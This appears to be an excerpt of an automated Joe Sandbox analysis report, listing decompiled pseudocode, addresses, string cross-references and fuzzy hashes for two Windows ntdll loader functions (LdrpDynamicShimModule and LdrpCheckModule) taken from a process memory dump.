                                                                                                                                                                                      • Opcode Fuzzy Hash: baf14107e615ae4629336ffaeafb72526e5865c7657541bf526c059a0fea375f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B813C75D052699BDB31CF54CC80BEEB6B8AF09710F1181EAEA09B7250D7705E85CFA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 35%
                                                                                                                                                                                      			E1D86237A(intOrPtr* __ecx, void* __edx) {
                                                                                                                                                                                      				char _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				intOrPtr* _v16;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                      				signed int _t30;
                                                                                                                                                                                      				signed char _t36;
                                                                                                                                                                                      				intOrPtr _t38;
                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                      				void* _t48;
                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                      				intOrPtr* _t51;
                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                      				void* _t59;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t38 =  *0x1d9338b8; // 0x1
                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                      				_t55 = 0;
                                                                                                                                                                                      				if(_t38 == 0) {
                                                                                                                                                                                      					L2:
                                                                                                                                                                                      					if(_t38 == 1) {
                                                                                                                                                                                      						_t22 =  *0x1d9368d8; // 0x0
                                                                                                                                                                                      						if(_t22 != 0) {
                                                                                                                                                                                      							E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
                                                                                                                                                                                      							 *0x1d9368d8 = _t50;
                                                                                                                                                                                      							 *0x1d935d4c = _t50;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x1d9338b8 = _t38;
                                                                                                                                                                                      					return _t55;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t59 =  *0x1d9368d8 - _t55; // 0x0
                                                                                                                                                                                      				if(_t59 != 0) {
                                                                                                                                                                                      					 *0x1d9338b8 = 0;
                                                                                                                                                                                      					_t55 = E1D8C1BB6(_t38,  &_v8);
                                                                                                                                                                                      					if(_t55 >= 0) {
                                                                                                                                                                                      						_t51 =  *0x1d9368d8; // 0x0
                                                                                                                                                                                      						while( *_t51 != 0) {
                                                                                                                                                                                      							 *0x1d9391e0(_t51, 0, 1, 1, 0, 1, 0x10);
                                                                                                                                                                                      							_v8();
                                                                                                                                                                                      							if(0 == 0) {
                                                                                                                                                                                      								_t55 = 0xc0000142;
                                                                                                                                                                                      								L21:
                                                                                                                                                                                      								_t50 = 0;
                                                                                                                                                                                      								goto L2;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t42 = _t51;
                                                                                                                                                                                      							_t10 = _t42 + 2; // 0x2
                                                                                                                                                                                      							_t48 = _t10;
                                                                                                                                                                                      							do {
                                                                                                                                                                                      								_t29 =  *_t42;
                                                                                                                                                                                      								_t42 = _t42 + 2;
                                                                                                                                                                                      							} while (_t29 != _v12);
                                                                                                                                                                                      							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t30 =  *0x7ffe0330;
                                                                                                                                                                                      						_t53 =  *0x1d939218; // 0x0
                                                                                                                                                                                      						_v12 = _t30;
                                                                                                                                                                                      						_t45 = 0x20;
                                                                                                                                                                                      						_t46 = _t45 - (_t30 & 0x0000001f);
                                                                                                                                                                                      						asm("ror edi, cl");
                                                                                                                                                                                      						E1D84FED0(0x1d9332d8);
                                                                                                                                                                                      						if( *0x1d9365f4 < 3) {
                                                                                                                                                                                      							_t46 = _v16;
                                                                                                                                                                                      							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
                                                                                                                                                                                      								E1D836704(_t46, _t53 ^ _v12);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push(0x1d9332d8);
                                                                                                                                                                                      						E1D84E740(_t46);
                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t36 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      					if((_t36 & 0x00000003) != 0) {
                                                                                                                                                                                      						E1D8BE692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
                                                                                                                                                                                      						_t36 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if((_t36 & 0x00000010) != 0) {
                                                                                                                                                                                      						asm("int3");
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t55 = _t50;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                      			}




















                                                                                                                                                                                      0x1d862383
                                                                                                                                                                                      0x1d86238b
                                                                                                                                                                                      0x1d86238d
                                                                                                                                                                                      0x1d862390
                                                                                                                                                                                      0x1d862393
                                                                                                                                                                                      0x1d862397
                                                                                                                                                                                      0x1d8623a5
                                                                                                                                                                                      0x1d8623a8
                                                                                                                                                                                      0x1d8623aa
                                                                                                                                                                                      0x1d8623b1
                                                                                                                                                                                      0x1d8aa878
                                                                                                                                                                                      0x1d8aa87d
                                                                                                                                                                                      0x1d8aa883
                                                                                                                                                                                      0x1d8aa883
                                                                                                                                                                                      0x1d8623b1
                                                                                                                                                                                      0x1d8623ba
                                                                                                                                                                                      0x1d8623c3
                                                                                                                                                                                      0x1d8623c3
                                                                                                                                                                                      0x1d862399
                                                                                                                                                                                      0x1d86239f
                                                                                                                                                                                      0x1d8aa784
                                                                                                                                                                                      0x1d8aa78f
                                                                                                                                                                                      0x1d8aa793
                                                                                                                                                                                      0x1d8aa7cd
                                                                                                                                                                                      0x1d8aa80b
                                                                                                                                                                                      0x1d8aa7e3
                                                                                                                                                                                      0x1d8aa7e9
                                                                                                                                                                                      0x1d8aa7ee
                                                                                                                                                                                      0x1d8aa866
                                                                                                                                                                                      0x1d8aa85f
                                                                                                                                                                                      0x1d8aa85f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8aa85f
                                                                                                                                                                                      0x1d8aa7f0
                                                                                                                                                                                      0x1d8aa7f2
                                                                                                                                                                                      0x1d8aa7f2
                                                                                                                                                                                      0x1d8aa7f5
                                                                                                                                                                                      0x1d8aa7f5
                                                                                                                                                                                      0x1d8aa7f8
                                                                                                                                                                                      0x1d8aa7fb
                                                                                                                                                                                      0x1d8aa808
                                                                                                                                                                                      0x1d8aa808
                                                                                                                                                                                      0x1d8aa812
                                                                                                                                                                                      0x1d8aa817
                                                                                                                                                                                      0x1d8aa81f
                                                                                                                                                                                      0x1d8aa825
                                                                                                                                                                                      0x1d8aa826
                                                                                                                                                                                      0x1d8aa82d
                                                                                                                                                                                      0x1d8aa82f
                                                                                                                                                                                      0x1d8aa83b
                                                                                                                                                                                      0x1d8aa83d
                                                                                                                                                                                      0x1d8aa849
                                                                                                                                                                                      0x1d8aa850
                                                                                                                                                                                      0x1d8aa850
                                                                                                                                                                                      0x1d8aa849
                                                                                                                                                                                      0x1d8aa855
                                                                                                                                                                                      0x1d8aa85a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8aa85a
                                                                                                                                                                                      0x1d8aa795
                                                                                                                                                                                      0x1d8aa79c
                                                                                                                                                                                      0x1d8aa7b4
                                                                                                                                                                                      0x1d8aa7b9
                                                                                                                                                                                      0x1d8aa7be
                                                                                                                                                                                      0x1d8aa7c3
                                                                                                                                                                                      0x1d8aa7c5
                                                                                                                                                                                      0x1d8aa7c5
                                                                                                                                                                                      0x1d8aa7c6
                                                                                                                                                                                      0x1d8aa7c6
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D8AA79F
                                                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 1D8AA7A5
                                                                                                                                                                                      • apphelp.dll, xrefs: 1D862382
                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1D8AA7AF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                      • API String ID: 0-176724104
                                                                                                                                                                                      • Opcode ID: 6fdc4ab4d08dfb35abbb355a8fbfb476bcf2e2e45c42aa40cd61c81ff0b063c7
                                                                                                                                                                                      • Instruction ID: ca520c6f11d7d9c9bc44e934413f209bfcd31708bc3d4f7e937300408df3c47a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fdc4ab4d08dfb35abbb355a8fbfb476bcf2e2e45c42aa40cd61c81ff0b063c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 203124BAA04251FBD7009F69C8C0BABB7B4FB84B54F11405DF9056B762DB70A842CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                                                      			E1D860AEB(void* __ecx) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				signed int _v16;
                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                      				signed int _v24;
                                                                                                                                                                                      				intOrPtr _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				signed int _v36;
                                                                                                                                                                                      				signed int _v40;
                                                                                                                                                                                      				intOrPtr _t67;
                                                                                                                                                                                      				signed int _t70;
                                                                                                                                                                                      				signed int _t76;
                                                                                                                                                                                      				intOrPtr _t78;
                                                                                                                                                                                      				intOrPtr _t79;
                                                                                                                                                                                      				intOrPtr _t84;
                                                                                                                                                                                      				intOrPtr _t89;
                                                                                                                                                                                      				signed int _t90;
                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                      				signed char _t101;
                                                                                                                                                                                      				intOrPtr _t104;
                                                                                                                                                                                      				void* _t108;
                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                      				signed int _t113;
                                                                                                                                                                                      				intOrPtr* _t117;
                                                                                                                                                                                      				signed int _t119;
                                                                                                                                                                                      				intOrPtr* _t120;
                                                                                                                                                                                      				signed int _t121;
                                                                                                                                                                                      				intOrPtr* _t122;
                                                                                                                                                                                      				signed int _t126;
                                                                                                                                                                                      				void* _t130;
                                                                                                                                                                                      				void* _t131;
                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                      				signed int _t134;
                                                                                                                                                                                      				signed int _t135;
                                                                                                                                                                                      				intOrPtr _t136;
                                                                                                                                                                                      				signed int _t137;
                                                                                                                                                                                      				signed int _t138;
                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                      				void* _t140;
                                                                                                                                                                                      				void* _t141;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t134 = 0;
                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                      				_t141 =  *0x1d9368d8 - _t134; // 0x0
                                                                                                                                                                                      				if(_t141 != 0) {
                                                                                                                                                                                      					_v20 = 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				if( *0x1d9365f9 == 0) {
                                                                                                                                                                                      					_t136 =  *((intOrPtr*)(_t108 + 4));
                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                      						__eflags = _t136 - _t108;
                                                                                                                                                                                      						if(_t136 == _t108) {
                                                                                                                                                                                      							break;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t110 = _t136 - 0x54;
                                                                                                                                                                                      						E1D877550(_t136 - 0x54);
                                                                                                                                                                                      						_t136 =  *((intOrPtr*)(_t136 + 4));
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L2:
                                                                                                                                                                                      					_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x68));
                                                                                                                                                                                      					E1D84FED0(0x1d9332d8);
                                                                                                                                                                                      					if( *0x1d9365f0 != 0) {
                                                                                                                                                                                      						_t126 =  *0x7ffe0330;
                                                                                                                                                                                      						_t135 =  *0x1d939218; // 0x0
                                                                                                                                                                                      						_t111 = 0x20;
                                                                                                                                                                                      						_t110 = _t111 - (_t126 & 0x0000001f);
                                                                                                                                                                                      						asm("ror edi, cl");
                                                                                                                                                                                      						_t134 = _t135 ^ _t126;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t137 = 0;
                                                                                                                                                                                      					_t67 =  *((intOrPtr*)(_t108 + 4));
                                                                                                                                                                                      					_v36 = 0;
                                                                                                                                                                                      					_v32 = _t67;
                                                                                                                                                                                      					if(_t67 == _t108) {
                                                                                                                                                                                      						L11:
                                                                                                                                                                                      						_push(0x1d9332d8);
                                                                                                                                                                                      						E1D84E740(_t110);
                                                                                                                                                                                      						return _t137;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t113 = _v16 & 0x00000100;
                                                                                                                                                                                      						_v16 = _t113;
                                                                                                                                                                                      						do {
                                                                                                                                                                                      							_t138 = _t67 - 0x54;
                                                                                                                                                                                      							if(_t113 != 0) {
                                                                                                                                                                                      								_t110 = _t138;
                                                                                                                                                                                      								_t70 = E1D836DA6(_t138);
                                                                                                                                                                                      								_v36 = _t70;
                                                                                                                                                                                      								__eflags = _t70;
                                                                                                                                                                                      								if(_t70 < 0) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t114 = _t138;
                                                                                                                                                                                      							E1D8498DE(_t138, 0);
                                                                                                                                                                                      							if(_t134 != 0) {
                                                                                                                                                                                      								__eflags =  *0x1d9365f8;
                                                                                                                                                                                      								if(__eflags == 0) {
                                                                                                                                                                                      									_t114 = _t134;
                                                                                                                                                                                      									 *0x1d9391e0(_t138);
                                                                                                                                                                                      									 *_t134();
                                                                                                                                                                                      									 *(_t138 + 0x35) =  *(_t138 + 0x35) | 0x00000008;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t148 = _v20;
                                                                                                                                                                                      							if(_v20 == 0) {
                                                                                                                                                                                      								_t76 =  *(_t138 + 0x28);
                                                                                                                                                                                      								_t114 = _t76;
                                                                                                                                                                                      								_t130 = 0x10;
                                                                                                                                                                                      								_v8 = _t76;
                                                                                                                                                                                      								if(E1D861C7D(_t76, _t130, _t148) != 0) {
                                                                                                                                                                                      									_t117 = _v8;
                                                                                                                                                                                      									_t31 = _t117 + 2; // 0x2
                                                                                                                                                                                      									_t131 = _t31;
                                                                                                                                                                                      									do {
                                                                                                                                                                                      										_t78 =  *_t117;
                                                                                                                                                                                      										_t117 = _t117 + 2;
                                                                                                                                                                                      										__eflags = _t78 - _v12;
                                                                                                                                                                                      									} while (_t78 != _v12);
                                                                                                                                                                                      									_t114 = _t117 - _t131 >> 1;
                                                                                                                                                                                      									__eflags =  *0x1d9368d8;
                                                                                                                                                                                      									if( *0x1d9368d8 == 0) {
                                                                                                                                                                                      										_t33 = _t114 + 2; // 0x0
                                                                                                                                                                                      										_t79 = _t33;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t104 =  *0x1d935d4c; // 0x0
                                                                                                                                                                                      										_t79 = _t104 + 1 + _t114;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_v28 = _t79;
                                                                                                                                                                                      									_t132 = E1D855D90(_t114,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t79 + _t79);
                                                                                                                                                                                      									_v24 = _t132;
                                                                                                                                                                                      									__eflags = _t132;
                                                                                                                                                                                      									if(_t132 != 0) {
                                                                                                                                                                                      										_t119 =  *0x1d9368d8; // 0x0
                                                                                                                                                                                      										__eflags = _t119;
                                                                                                                                                                                      										if(_t119 == 0) {
                                                                                                                                                                                      											_t120 = _v8;
                                                                                                                                                                                      											_t52 = _t120 + 2; // 0x2
                                                                                                                                                                                      											_v40 = _t52;
                                                                                                                                                                                      											do {
                                                                                                                                                                                      												_t84 =  *_t120;
                                                                                                                                                                                      												_t120 = _t120 + 2;
                                                                                                                                                                                      												__eflags = _t84 - _v12;
                                                                                                                                                                                      											} while (_t84 != _v12);
                                                                                                                                                                                      											_t121 = _t120 - _v40;
                                                                                                                                                                                      											__eflags = _t121;
                                                                                                                                                                                      											_t114 = _t121 >> 1;
                                                                                                                                                                                      											E1D8888C0(_t132, _v8, (_t121 >> 1) + (_t121 >> 1));
                                                                                                                                                                                      											_t139 = _t139 + 0xc;
                                                                                                                                                                                      											L39:
                                                                                                                                                                                      											 *0x1d9368d8 = _v24;
                                                                                                                                                                                      											 *0x1d935d4c = _v28;
                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										_t89 =  *0x1d935d4c; // 0x0
                                                                                                                                                                                      										_t90 = _t89 + _t89;
                                                                                                                                                                                      										__eflags = _t90;
                                                                                                                                                                                      										_v40 = _t90;
                                                                                                                                                                                      										E1D8888C0(_t132, _t119, _t90);
                                                                                                                                                                                      										_t133 = _v8;
                                                                                                                                                                                      										_t140 = _t139 + 0xc;
                                                                                                                                                                                      										_t122 = _v8;
                                                                                                                                                                                      										_t43 = _t122 + 2; // 0x2
                                                                                                                                                                                      										_v8 = _t43;
                                                                                                                                                                                      										do {
                                                                                                                                                                                      											_t93 =  *_t122;
                                                                                                                                                                                      											_t122 = _t122 + 2;
                                                                                                                                                                                      											__eflags = _t93 - _v12;
                                                                                                                                                                                      										} while (_t93 != _v12);
                                                                                                                                                                                      										_t114 = _v40 + 2;
                                                                                                                                                                                      										E1D8888C0(_v24 + _v40 + 2, _t133, (_t122 - _v8 >> 1) + (_t122 - _v8 >> 1));
                                                                                                                                                                                      										_t139 = _t140 + 0xc;
                                                                                                                                                                                      										E1D853BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x1d9368d8);
                                                                                                                                                                                      										goto L39;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t101 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      										__eflags = _t101 & 0x00000003;
                                                                                                                                                                                      										if((_t101 & 0x00000003) != 0) {
                                                                                                                                                                                      											_push("Failed to allocated memory for shimmed module list\n");
                                                                                                                                                                                      											__eflags = 0;
                                                                                                                                                                                      											_push(0);
                                                                                                                                                                                      											_push("LdrpCheckModule");
                                                                                                                                                                                      											_push(0xaf4);
                                                                                                                                                                                      											_push("minkernel\\ntdll\\ldrinit.c");
                                                                                                                                                                                      											E1D8BE692();
                                                                                                                                                                                      											_t101 =  *0x1d9337c0; // 0x0
                                                                                                                                                                                      											_t139 = _t139 + 0x14;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										__eflags = _t101 & 0x00000010;
                                                                                                                                                                                      										if((_t101 & 0x00000010) != 0) {
                                                                                                                                                                                      											asm("int3");
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L9;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L9:
                                                                                                                                                                                      							E1D860C2C(_t138, 1, _t114);
                                                                                                                                                                                      							 *(_t138 + 0x34) =  *(_t138 + 0x34) | 0x00000008;
                                                                                                                                                                                      							E1D85DF36( *((intOrPtr*)(_t138 + 0x18)), _t138 + 0x24, 0x14ad);
                                                                                                                                                                                      							_t113 = _v16;
                                                                                                                                                                                      							_t67 =  *((intOrPtr*)(_v32 + 4));
                                                                                                                                                                                      							_v32 = _t67;
                                                                                                                                                                                      						} while (_t67 != _t108);
                                                                                                                                                                                      						_t137 = _v36;
                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}











































                                                                                                                                                                                      0x1d860af6
                                                                                                                                                                                      0x1d860af8
                                                                                                                                                                                      0x1d860afa
                                                                                                                                                                                      0x1d860afd
                                                                                                                                                                                      0x1d860b00
                                                                                                                                                                                      0x1d860b06
                                                                                                                                                                                      0x1d8a9ea5
                                                                                                                                                                                      0x1d8a9ea5
                                                                                                                                                                                      0x1d860b13
                                                                                                                                                                                      0x1d860bd3
                                                                                                                                                                                      0x1d860be3
                                                                                                                                                                                      0x1d860be3
                                                                                                                                                                                      0x1d860be5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d860bd8
                                                                                                                                                                                      0x1d860bdb
                                                                                                                                                                                      0x1d860be0
                                                                                                                                                                                      0x1d860be0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d860b19
                                                                                                                                                                                      0x1d860b19
                                                                                                                                                                                      0x1d860b27
                                                                                                                                                                                      0x1d860b2a
                                                                                                                                                                                      0x1d860b36
                                                                                                                                                                                      0x1d860c0d
                                                                                                                                                                                      0x1d860c15
                                                                                                                                                                                      0x1d860c20
                                                                                                                                                                                      0x1d860c21
                                                                                                                                                                                      0x1d860c23
                                                                                                                                                                                      0x1d860c25
                                                                                                                                                                                      0x1d860c25
                                                                                                                                                                                      0x1d860b3e
                                                                                                                                                                                      0x1d860b40
                                                                                                                                                                                      0x1d860b43
                                                                                                                                                                                      0x1d860b46
                                                                                                                                                                                      0x1d860b4b
                                                                                                                                                                                      0x1d860bc2
                                                                                                                                                                                      0x1d860bc2
                                                                                                                                                                                      0x1d860bc7
                                                                                                                                                                                      0x1d860bd2
                                                                                                                                                                                      0x1d860b4d
                                                                                                                                                                                      0x1d860b50
                                                                                                                                                                                      0x1d860b56
                                                                                                                                                                                      0x1d860b59
                                                                                                                                                                                      0x1d860b59
                                                                                                                                                                                      0x1d860b5e
                                                                                                                                                                                      0x1d8a9eb1
                                                                                                                                                                                      0x1d8a9eb3
                                                                                                                                                                                      0x1d8a9eb8
                                                                                                                                                                                      0x1d8a9ebb
                                                                                                                                                                                      0x1d8a9ebd
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9ec3
                                                                                                                                                                                      0x1d860b66
                                                                                                                                                                                      0x1d860b69
                                                                                                                                                                                      0x1d860b70
                                                                                                                                                                                      0x1d860bec
                                                                                                                                                                                      0x1d860bf3
                                                                                                                                                                                      0x1d860bfa
                                                                                                                                                                                      0x1d860bfc
                                                                                                                                                                                      0x1d860c02
                                                                                                                                                                                      0x1d860c04
                                                                                                                                                                                      0x1d860c04
                                                                                                                                                                                      0x1d860bf3
                                                                                                                                                                                      0x1d860b72
                                                                                                                                                                                      0x1d860b76
                                                                                                                                                                                      0x1d860b78
                                                                                                                                                                                      0x1d860b7b
                                                                                                                                                                                      0x1d860b7f
                                                                                                                                                                                      0x1d860b80
                                                                                                                                                                                      0x1d860b8a
                                                                                                                                                                                      0x1d8a9ec8
                                                                                                                                                                                      0x1d8a9ecb
                                                                                                                                                                                      0x1d8a9ecb
                                                                                                                                                                                      0x1d8a9ece
                                                                                                                                                                                      0x1d8a9ece
                                                                                                                                                                                      0x1d8a9ed1
                                                                                                                                                                                      0x1d8a9ed4
                                                                                                                                                                                      0x1d8a9ed4
                                                                                                                                                                                      0x1d8a9edc
                                                                                                                                                                                      0x1d8a9ede
                                                                                                                                                                                      0x1d8a9ee5
                                                                                                                                                                                      0x1d8a9ef1
                                                                                                                                                                                      0x1d8a9ef1
                                                                                                                                                                                      0x1d8a9ee7
                                                                                                                                                                                      0x1d8a9ee7
                                                                                                                                                                                      0x1d8a9eed
                                                                                                                                                                                      0x1d8a9eed
                                                                                                                                                                                      0x1d8a9ef4
                                                                                                                                                                                      0x1d8a9f0a
                                                                                                                                                                                      0x1d8a9f0c
                                                                                                                                                                                      0x1d8a9f0f
                                                                                                                                                                                      0x1d8a9f11
                                                                                                                                                                                      0x1d8a9f4e
                                                                                                                                                                                      0x1d8a9f54
                                                                                                                                                                                      0x1d8a9f56
                                                                                                                                                                                      0x1d8a9fbb
                                                                                                                                                                                      0x1d8a9fbe
                                                                                                                                                                                      0x1d8a9fc1
                                                                                                                                                                                      0x1d8a9fc4
                                                                                                                                                                                      0x1d8a9fc4
                                                                                                                                                                                      0x1d8a9fc7
                                                                                                                                                                                      0x1d8a9fca
                                                                                                                                                                                      0x1d8a9fca
                                                                                                                                                                                      0x1d8a9fd0
                                                                                                                                                                                      0x1d8a9fd0
                                                                                                                                                                                      0x1d8a9fd3
                                                                                                                                                                                      0x1d8a9fdd
                                                                                                                                                                                      0x1d8a9fe2
                                                                                                                                                                                      0x1d8a9fe5
                                                                                                                                                                                      0x1d8a9fe8
                                                                                                                                                                                      0x1d8a9ff0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9ff0
                                                                                                                                                                                      0x1d8a9f58
                                                                                                                                                                                      0x1d8a9f5d
                                                                                                                                                                                      0x1d8a9f5d
                                                                                                                                                                                      0x1d8a9f62
                                                                                                                                                                                      0x1d8a9f65
                                                                                                                                                                                      0x1d8a9f6a
                                                                                                                                                                                      0x1d8a9f6d
                                                                                                                                                                                      0x1d8a9f70
                                                                                                                                                                                      0x1d8a9f72
                                                                                                                                                                                      0x1d8a9f75
                                                                                                                                                                                      0x1d8a9f78
                                                                                                                                                                                      0x1d8a9f78
                                                                                                                                                                                      0x1d8a9f7b
                                                                                                                                                                                      0x1d8a9f7e
                                                                                                                                                                                      0x1d8a9f7e
                                                                                                                                                                                      0x1d8a9f93
                                                                                                                                                                                      0x1d8a9f9a
                                                                                                                                                                                      0x1d8a9f9f
                                                                                                                                                                                      0x1d8a9fb4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9f13
                                                                                                                                                                                      0x1d8a9f13
                                                                                                                                                                                      0x1d8a9f18
                                                                                                                                                                                      0x1d8a9f1a
                                                                                                                                                                                      0x1d8a9f1c
                                                                                                                                                                                      0x1d8a9f21
                                                                                                                                                                                      0x1d8a9f23
                                                                                                                                                                                      0x1d8a9f24
                                                                                                                                                                                      0x1d8a9f29
                                                                                                                                                                                      0x1d8a9f2e
                                                                                                                                                                                      0x1d8a9f33
                                                                                                                                                                                      0x1d8a9f38
                                                                                                                                                                                      0x1d8a9f3d
                                                                                                                                                                                      0x1d8a9f3d
                                                                                                                                                                                      0x1d8a9f40
                                                                                                                                                                                      0x1d8a9f42
                                                                                                                                                                                      0x1d8a9f48
                                                                                                                                                                                      0x1d8a9f48
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d8a9f42
                                                                                                                                                                                      0x1d8a9f11
                                                                                                                                                                                      0x1d860b8a
                                                                                                                                                                                      0x1d860b90
                                                                                                                                                                                      0x1d860b96
                                                                                                                                                                                      0x1d860ba1
                                                                                                                                                                                      0x1d860baa
                                                                                                                                                                                      0x1d860bb2
                                                                                                                                                                                      0x1d860bb5
                                                                                                                                                                                      0x1d860bb8
                                                                                                                                                                                      0x1d860bbb
                                                                                                                                                                                      0x1d860bbf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x1d860bbf
                                                                                                                                                                                      0x1d860b4b

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • LdrpCheckModule, xrefs: 1D8A9F24
                                                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1D8A9F1C
                                                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1D8A9F2E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                                                      • Opcode ID: 0612f8814d09fb6bbe78b801785f0cc55f0d4660fe7bc34fb1295ad1694721b2
                                                                                                                                                                                      • Instruction ID: 3f338ceeb7d3449d48285a71c7af3b3ad0c9e5edefef9119f33ee98d80191445
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0612f8814d09fb6bbe78b801785f0cc55f0d4660fe7bc34fb1295ad1694721b2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A71E278A04255EFCB05DF68C880BBEB7F0FB48718F158469E905E7252E734AD42CB66
